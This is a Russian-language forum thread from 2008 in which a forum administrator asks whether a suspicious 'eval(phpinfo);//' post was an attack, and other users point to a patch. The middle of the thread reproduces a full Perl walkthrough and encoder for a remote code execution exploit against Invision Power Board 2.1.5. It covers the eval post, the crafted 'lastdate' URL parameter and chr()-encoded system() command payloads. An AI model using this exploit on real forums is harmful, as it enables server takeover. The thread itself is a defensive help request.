TIER_FOREVER Опубликовано 22 Февраля 2008 Жалоба Поделиться Опубликовано 22 Февраля 2008 Запостил один придурок: eval(phpinfo);// Спустя минуту, отредатктил это сообщение на: спасибо Это эксплоит был, да? Чё делать? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 xRay Опубликовано 22 Февраля 2008 Жалоба Поделиться Опубликовано 22 Февраля 2008 если ты ты увидел это как текст в сообщении значит не сработало у негои баг у тебя этот закрыт Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 TIER_FOREVER Опубликовано 22 Февраля 2008 Автор Жалоба Поделиться Опубликовано 22 Февраля 2008 Да, я увидел это как обычный пост с текстом: eval(phpinfo);// А потом вместо eval(phpinfo);// написали спасибо. полазил по инету и вот что нашёл: #!usr/bin/perl ## Invision Power Board <= 2.1.5 Remote Code Execution Tutorial ## By not null ## Security Bunker Team ## http://secbun.info ## It is not an exploit! It is only tutorial, how to exploit a forum! print q( #-----------------------------------------# # Invision Power Board 2.x.x RCE Tutorial # # By Security Bunker Team | ©not null # # http://www.secbun.info # #-----------------------------------------# ); print q( Step 1: If you are already register on the forum, just login on it. Else register first;]); print "\r\nPress enter when finished...\r\n"; $ok = <STDIN>; print q( Ok, we have successful log in. Let's fun;] Step 2: Go to some of the forum, where you could post messages. Step 3: Post a message, that consist our harmful code (muahaha) The code is: "eval(phpinfo()); //" [without quotes] ); print "\r\nPress enter when finished...\r\n"; $ok = <STDIN>; print q(When message is post, open a new page in your browser and go to the Search (index.php?act=search). Use the search form to find your post just by your username. And make sure "Show results as posts" is selected.); print "\r\nPress enter when finished...\r\n"; $ok = <STDIN>; print q(You must see your post, that consist our code. Then add to the end of the url next string:); print "\r\n&lastdate=z|eval.*?%20//)%23e%00\r\n"; print q(and press enter...); print "\r\nPress enter when finished...\r\n"; $ok = <STDIN>; print q(Can you see a result of phpinfo? If yes, we have successful exploited forum :-] So, let's modify our post to get a shell. But on this step we have a problem: we can't use arguments in functions (e.g. system("ls")) in such form. But we can use it by it's code (e.g. system(chr(34).chr(108).chr(115).chr(34))) I'm include a simple tool, that will help you to encode you string into code. Just type your command, and you will get a string, that you can copy and paste into your post); print "\r\n"; $out = ""; while () { print "\r\nCommand for encode or 'exit' for exit "; while(<STDIN>) { $cmd=$_; chomp($cmd); exit() if ($cmd eq 'exit'); last; } $len = length($cmd); for ($i=0; $i<$len; $i++) { $s = substr($cmd,$i,1); $out.="chr(".ord($s).")"; if($i != $len-1) { $out.="."; } } print "eval(system(".$out.").chr(59).exit()); //"; $out = ""; } Есть такой сплоит и небольшое описание по использованию но имхо до конца не разобрался Вписываю пост eval(phpinfo()); // далее захожу в поиск ,добавляю в Урл&highlite=system&lastdate=z|eval.*?%20//)%23e%00обновляю ,появляется страница PhP 4.0 Гляньте источник: http://www.exploit.in/forum/lofiversion/index.php/t4027.html Его действия были именно такими, пост, потом поиск. Что делать-то? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Arhar Опубликовано 22 Февраля 2008 Жалоба Поделиться Опубликовано 22 Февраля 2008 пост, потом поискhttp://www.ibresource.ru/forums/index.php?...8&hl=searchвроде это исправлениескорее всего у хакера ничего не вышло ну и посмотри все исправления какие есть Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 TIER_FOREVER Опубликовано 22 Февраля 2008 Автор Жалоба Поделиться Опубликовано 22 Февраля 2008 Окей, обновил. Спасибо. Не знаю получилось у него что или нет, но изменений никаких не вижу. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Song Опубликовано 23 Февраля 2008 Жалоба Поделиться Опубликовано 23 Февраля 2008 Это давнишний сплойт. Вот исравление: !!! Уязвимость удалённого выполнения команд на сервере от 25 апреля 2006 года Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 TIER_FOREVER Опубликовано 7 Марта 2008 Автор Жалоба Поделиться Опубликовано 7 Марта 2008 Спасибо, но это вроде бы тоже самое, что и Arhar дал выше. Разве что на разных сайтах. В любом случае спасибо, за помощь. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
TIER_FOREVER
Запостил один придурок: eval(phpinfo);//
Спустя минуту, отредатктил это сообщение на: спасибо
Это эксплоит был, да? Чё делать?
Ссылка на комментарий
Поделиться на других сайтах
6 ответов на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.